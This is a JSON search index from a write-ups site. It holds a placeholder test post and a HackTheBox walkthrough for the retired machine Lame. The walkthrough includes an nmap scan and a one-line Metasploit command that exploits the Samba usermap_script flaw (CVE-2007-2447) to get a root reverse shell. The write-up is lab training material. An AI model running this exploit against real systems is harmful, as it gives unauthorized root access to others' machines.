[{"content":"Overview\nIf you can read this on the site, the auto-update pipeline works.\nNotes\necho \"hello from a test writeup\"\n","permalink":"https://writeups.ekaitzo.com/writeups/test-writeup/","summary":"Just checking the publish pipeline works.","title":"Test Writeup"},{"content":" ⚠️ Lame is a retired HackTheBox machine, so this writeup is safe to publish.\nOverview\nLame is one of the oldest and easiest boxes on HackTheBox. Root comes directly from an unauthenticated command-injection vulnerability in Samba (CVE-2007-2447, the usermap_script bug), so there is no separate privilege-escalation step.\nRecon\nnmap -sC -sV -p- -oA nmap/lame 10.10.10.3\nKey open ports:\nPort Service\n21 vsftpd 2.3.4\n22 OpenSSH\n139 Samba 3.0.20\n445 Samba 3.0.20\nSamba 3.0.20 is vulnerable to the username map script command execution flaw.\nExploitation\nThe username field is passed to a shell unsanitised, so we can inject a command by wrapping it in backticks:\nmsfconsole -q -x \"use exploit/multi/samba/usermap_script; set RHOSTS 10.10.10.3; set LHOST tun0; run\"\nThis drops straight into a root shell — no privesc required.\nFlags\nFlag Value\nuser REDACTED\nroot REDACTED\nLessons Learned\nAlways version-check network services; ancient Samba/vsftpd builds carry known RCEs.\nThe Samba usermap_script bug is a textbook example of unsanitised input reaching a shell.\n","permalink":"https://writeups.ekaitzo.com/writeups/htb-lame/","summary":"Classic easy Linux box rooted via the Samba usermap_script RCE (CVE-2007-2447).","title":"HTB: Lame"}]